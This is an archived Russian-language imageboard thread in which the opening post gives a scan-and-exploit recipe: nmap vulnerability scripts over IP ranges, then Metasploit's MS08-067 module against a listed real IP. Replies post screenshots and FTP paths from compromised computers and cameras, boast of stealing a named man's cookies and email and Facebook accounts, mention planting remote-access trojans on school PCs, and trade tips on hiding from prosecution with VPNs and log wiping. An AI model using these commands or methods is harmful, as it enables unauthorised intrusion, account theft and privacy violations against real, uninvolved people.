Этого треда уже нет.
Это копия, сохраненная 23 марта 2018 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Сап х@рk@4 ! Х@kеP0v тред. Задание - пилим скрины, 172927027 В конец треда | Веб
Сап х@рk@4 ! Х@kеP0v тред.

Задание - пилим скрины, интересные фото и тп со взломаных ПК/Серверов/Облачных хранилищ/Web КАМЕР

Инструкция: качаем nmap и metasploit
Создадим папку скан.
В ней:
создадим файл ips.txt со списком диапазонов ip адресов
В терминале

nmap -p 21,139,445,145 --open --script smb-vuln-ms17-010,smb-vuln-ms10-061,smb-vuln-ms10-054,smb-vuln-ms08-067,smb-vuln-ms07-029,smb-vuln-ms06-025,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,ftp-vsftpd-backdoor,ftp-proftpd-backdoor,ftp-anon -T4 -iL ips.txt -oN out.txt

Все данные будут переть в out.txt
Там ищем что-то похожее на

Nmap scan report for 5-248-21-106.broadband.kyivstar.net (5.248.21.106)
Host is up (0.018s latency).
Not shown: 2 closed ports, 1 filtered port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/


Отсюда мы выпиливаем ip и имя дырки smb-vuln-ms08-067
Открываем метасплоит
search mb-vuln-ms08-067
use exploit/windows/smb/ms08_067_netapi
set rhost 5.248.21.106
run
!?!?!?!??!?!?!?!?PROFIT?!?!?!??!?!?!Ё?!??!?!

Если увидели
meterpreter >
Вы внутри.
Если нет ищите другой комп.

Стартуем!
sage 2 172927104
Все в тихий дом, нетсталкер на дваче
3 172927528
Как хакир видит сибя и как хакир выглядет на самам дели
gszKhnbP.jpeg207 Кб, 1280x1024
4 172927785
скрин с еще одного взломаного компа
11.jpg144 Кб, 1024x680
5 172928905
7 172929741
>>29526
кинь шифровальщик wannacry)))
image.png16 Кб, 70x119
8 172929787
11 172930537
>>27785
Там, похоже, кто-то слабовидящий.
12 172930603
>>30486
Да, точно тот самый вирус. Я им чуть себе хомяк не зашифровал.
Снимок экрана от 2018-03-22 22-00-05.png325 Кб, 1366x768
13 172930608
>>30537
Валерий Данилович его зовут он с хохленда)))
Слил куки с его кома. Там майл акк и акк фэйсбука был)
14 172930626
>>30603
спасиб бро)
sage 15 172930658
И нахуя вам это?
Зарепортил.
16 172930766
>>30658
просто так
17 172931171
мож на комп залить архив гей порно?)
18 172932319
>>27027 (OP)
загугли что такое скрипткидди, скрипткидди
19 172932534
Че за хуйня? Я запускаю сплоит. Он дает сессию метерпретер, через пару сек сессия обрывается и больше подкл не могу
20 172933127
Скрина моего экрана пока нет. Это хорошо.
21 172935411
>>27027 (OP)
Хуйня
Вирусопичатель-одиночка
image.png372 Кб, 400x600
22 172935630
>>35411

>Вирусопичатель-одиночка



Так и запишем...
texcharal1991.png254 Кб, 1024x1024
23 172936827
Скачал в сети русский пул адресов. Попробуем что там ОП наобещал.
24 172936897
Пока везде:

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
25 172937179
>>36897 это не дырявые сервы. Жди
26 172937357
>>35630
Я ни с кем не сотрудничаю, тов.майор
27 172937566
>>37179
Это всё проход host-*.pppoe.omsknet.ru
28 172938840
>>37179
В Украине быстро нашлись уязвимые сервисы.
29 172939250
Первый раз в жизни запустил msfconsole. Для него нужно поднимать и настраивать PostgreSQL или продолжить использовать так?
518SoulKingPalace.png537 Кб, 1000x882
30 172939448
Нет smb-vuln-cve2009-3103 в Metasploit...
31 172939501
>>39448
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
32 172939519
>>39501
Nmap scan report for 5.53.118.50
Host is up (0.084s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
33 172939682
>>27027 (OP)

>со списком диапазонов ip адресов


со списком диапазонов как раз не работает
34 172939700
>>27027 (OP)
Ты по каким материалам учился? Тоже хочу стать какером
35 172939857
>>39682
А ты списочек правильно подавай.

Пример: 5.1.0.0/19
36 172939906
>>39857
Можешь несколько подобных подсетей задавать. Только пробел между ними ставь. А без -iL можно ip прямо в консоль подавать.
37 172939937
>>39700
Плиз не игнорь, бамп реквесту
38 172940016
>>39937
Я не ОП треда.
39 172940041
>>39250
и без него можно
40 172940078
>>39700
Linux умеешь использовать?
41 172940109
>>39937
>>39700
англоютуб
42 172940124
эээээ блдядь вы как мой рабочий стол сфотакали????!!!!!
43 172940215
Кстати ОП, а чем лучше всего под Linux'ом (можно через Wine) открывать найденный вебки?
44 172940227
>>40078
Нет пока, я скачал курс по информационной безопасности вчера. Секреты Хакеров называется, пока выучил первые три части, но там только теория, практика (в том числе ganu linux) ближе к концу. Что про линукс посоветуешь?
45 172940244
>>40016
И я не ОП. Так что извини, не подскажу
46 172940278
>>40109
Хуево, я немецкий учил. Надо на инглиш пепеходить
47 172940317
>>40227
Да я ничего не могу тебе подсказать. Тебе бы надо с ОПом связаться. Он подскажет думаю. Он вроде грамотный чувак-то
48 172940341
ghjgecr d extremepron
Снимок экрана от 2018-03-23 00-29-02.png240 Кб, 1366x768
49 172940403
>>40227
Ставь линукс на свой кудахтер пополняй клуб прыщеводов)))
50 172940415
>>40227
Я просто как вышла 8-ка укатился на Ubuntu, затем на Linux Mint, потом был Manjaro и сейчас уже 4 года на Arch Linux.

Просто если ты хоть немного попользуешься Linux'ом как основной системой, то современем даже Windows начинаешь лучше понимать.
51 172940429
>>40317
я оп
52 172940490
>>40403
>>40415

Какой дистрибутив для новичка подойдет?
53 172940516
>>40490
Минт
54 172940650
>>40490
Для просто исп - Deepin
Для исп и работы - Ubuntu/Mint
Для взлома Kali но я исп Mint

В принципе в дистрибутивы похожи, и там все одинаково, разница в пакетах предустановленных и оболочке
55 172940653
>>40490
Ubuntu за множество гайдов и инструкций к ней.
57 172940791
>>40653
Секрет прост - гайды от бубунты катят на mint или любой др дистрибутив и наоборот. Потому что это сук линукс. Мимо прыщевод с 4 уровневым стажем
58 172940906
>>40653
>>40650
>>40516
>>40717
Всем спасибо за ответы
59 172940963
>>40791
Просто Linux Mint вносит дополнительные особенности для понимания. Пользователь должен сам перейти от Ubuntu к другим дистрам после оценки своих потребностей.
60 172941023
>>27027 (OP)
Я что-то гляжу, по этим уязвимостям не попасть на комп с последними обновами. Может кто подкинуть ссыль, где можно свежие эксплойты найти?
61 172941028
>>40963
ну, да, все сперва бубунту ставили) ктот на ней до сих пор) Можно минт сразу ставить, он в исп простой и на винду похож.
Для фанатов эпл deepin
62 172941054
Холодец за щеку этой шкуре
64 172941086
>>41023
угощайтес https://www.exploit-db.com/
Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)
65 172941134
>>41083

>https://www.opennet.ru/opennews/art.shtml?num=43915


ничоси над чекнуть свой комп
67 172941388
>>41361
5.1.0.88
68 172941419
>>41361
на чье облако кинул?))) И че там?)
69 172941459
>>41419
Хз. Просто гулял по ftp-шникам и наткнулся на это.
70 172941523
Слышьте хацкеры, как на винде 8 настроить чтобы рабочий стол был статичен на 2х мониторах с 2мя разными обоинами. Как только выбираю 2 обоины включается режим слайд-шоу.
Да, меня унижает мой же ПК
Снимок экрана2018-03-2300-52-44.png35 Кб, 474x682
71 172941598
А вот тут мне удалось создать папку. Кейс атаки следующий: кидаем ему патченную версию Хрома для Android.
72 172941677
>>41598
Не буду палить адрес. Теперь надо только научиться модифицировать apk-шки и освоить программирование под Android.
73 172941685
>>41086

>Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)


Так тебе же всяких унылых рандомов выдаёт. А если на определённый комп надо?
74 172941936
Как там скрипткидди итт поживают? На школьные кудахтеры ратники поставили уже? Я вот да.
75 172941939
>>41685
определенный труднее, тут соц инженерия нужна, троянчика подкинуть, ну там ссылка на сайт, письмо на мыло, иногда помогает флэшку у двери кинуть)))
76 172942011
>>41936
збсь)
77 172942111
шо за хуйня тут происходит?
78 172942207
>>42111
клуб кулц хацкеров ур скрипт кидди.
Кто взламывет компы украинских бабулек, кто видео сервера, кто веб камеры ноутов))))
P2260077.JPG5,9 Мб, 4288x3216
79 172942545
ZEvcVkGQOk.jpg64 Кб, 604x602
80 172942570
82 172942620
Бл, жаль уже не найду, сохранять над былО) там огромный архив порнухи)))
83 172942668
>>42606
мы тут что всем тредом украинские ип сканим?...
GFf37KQcXbI.jpg281 Кб, 1280x960
84 172942770
>>42668

Ага. Только мне не слишком завидно. Что-то мне хочется прочитать что-нибудь про хакерскую этику.
85 172942820
Meterpreter устаревшее говно. Юзай Empire. А твоя самба - туда же. Есть FuzzBunch.
Мимо-тот-самый-кун-эксплоит-рдот
Снимок экрана2018-03-2301-23-48.png95 Кб, 648x868
87 172942960
89 172943089
>>27027 (OP)
как обезопасить себя?
запили гайд
90 172943114
>>42770
Какая этика это двач)
91 172943167
>>43089
Вовремя ставить обновления системы и завести keepasx для паролей.
92 172943187
>>43167
я не в этом смысле)
как обезопасить себя от наказания)
93 172943219
>>43089
как обезопасить себя от наказания*?

фикс
94 172943263
>>43030
Moar --> ftp 5.104.56.157/mmcblk0p1/SD_VIDEO/PRL001
95 172943280
>>43219
proxychains+hidemy.name
Или VPN
96 172943284
>>43219
VPN и не трогать граждан своей страны.
97 172943285
>>43187
>>43219
VPN. Я так вообще еще и по ssh к серву подрубаюсь и удаленно все делаю) Можно еще логи чистить. А брат фсб всеравно тя пасет. Это норма.
98 172943313
>>40490
зюзя.
99 172943378
Верните мне мой 2015...
100 172943433
>>43284
1. Не пиздить деньги.
2. Не вредить компу.
3. Не ломать граждан своей страны
4. VPN
5. Чистить логи на удаленном хосте/взломанном пк
6. Исп LiveUSB ос например кали и грузится онли через флэху. Ибо вся инфа хранится в оперативе и после перезагрузки стирается без шанса на восстановление
101 172943445
СУКА! ГОРИЗОНТ ЗАВАЛИЛА!!!
102 172943479
>>43445
5.104.60.64
103 172943553
>>43445
бля редко тян нахожу((
104 172943554
>>43479
Проверено. ЦП нет.
105 172943574
>>43554
а хотелось
Снимок экрана2018-03-2301-43-00.png48 Кб, 476x685
106 172943677
Это братцы ностальгия
107 172943720
>>43677
я до сих пор джабером пользуюсь. У меня на удаленном хосте сервер жабы стоит)
108 172943808
забавно во взломе самое важное - опыт. Чем больше опыта, тем больше шансов взломать. Когда начинал я мог день на сканирование диапозона потратить и не взломать ни одного хоста. Теперь за 30 мин 4 хоста вскрываю)
IMG0977.JPG6,4 Мб, 4752x3168
109 172943838
110 172943840
Эх, были люди в наше время...
111 172943894
какие профиты с этого поиметь можно? Вот взламываю комп а цели то нету. Максимум скрин сделаю или порно залью на раб стол...
112 172943902
>>43808
А что изменилось, если ты что тогда, что сейчас действуешь по одному сценарию
113 172943917
Как наши предки жили так долго вместе?
rtr2zxhh.jpg324 Кб, 1288x1119
114 172943972
>>40403

>минт


>яндекс-браузер

116 172944046
>>43902
тогда я знал только один способ проникнуть. Теперь кучу. Вообще мышление изменилось.
117 172944122
>>43433
как чистить логи на взломанном пк?
Снимок экрана2018-03-2301-56-30.png52 Кб, 475x635
118 172944234
Сяомипидор в треде
119 172944252
>>44122
в ручную, это от оооочень многого зависит, где как и когда следил, какая ос, версия, дырка, сплоит, полезная нагрузка и тп. Универсального способа нет. Да и надо оно тебе. Среднестатистический продвинутый юзер пеки не знает даж где они лежат
120 172944344
>>27027 (OP)
Объясните далекому от этой темы, почему smb так активно не эксплуатировался до последней найденной уязвимости.
121 172944378
>>44344
Потому что в сеть проник не proof-of-concept, а сразу готовый эксплоит.
122 172944391
>>44344
всегда исп, просто етерналблю шуму с ваннакраем наделала)
DSC05944.JPG2,8 Мб, 2304x3072
123 172944757
У тебя никогда не будет такой няши.
124 172944894
Сейчас бы со своего пк сканить мммм кайф
Фарму в массы abc
125 172945106
126 172945569
>>44757
ЦЕРКОВЬ ТNРЕЧА призываю тебя в тред дабы исправить сию фотографию.
127 172946038
128 172946536
Бамп хакерам
129 172947440
Вот вам лолю и копателя, бамп.
130 172948210
>>41598
Ньюфажный вопрос
Как создать на чужом ftp папку?
131 172948401
>>48210
пкм → создать папку ))))0
132 172948800
может кто-то vpn посоветует?
133 172948907
>>27027 (OP)
Где качать metasploit , браузер отказывается, пишет что вирусный и опасный.
134 172948946
>>42848

> 3 пик


> даже у него есть тян


> тян беспалевно держит ероху за руку


Теперь это баттхерт тред, лол.
135 172948978
>>48946
Родственник или тайный ёбырь
136 172949090
>>48978
А омежка как такую тян заимел?
Или это стандарт в Хохлостане?
137 172949122
>>49090
Действительно странно.
Тред утонул или удален.
Это копия, сохраненная 23 марта 2018 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
« /b/В начало тредаВеб-версияНастройки
/a//b//mu//s//vg/Все доски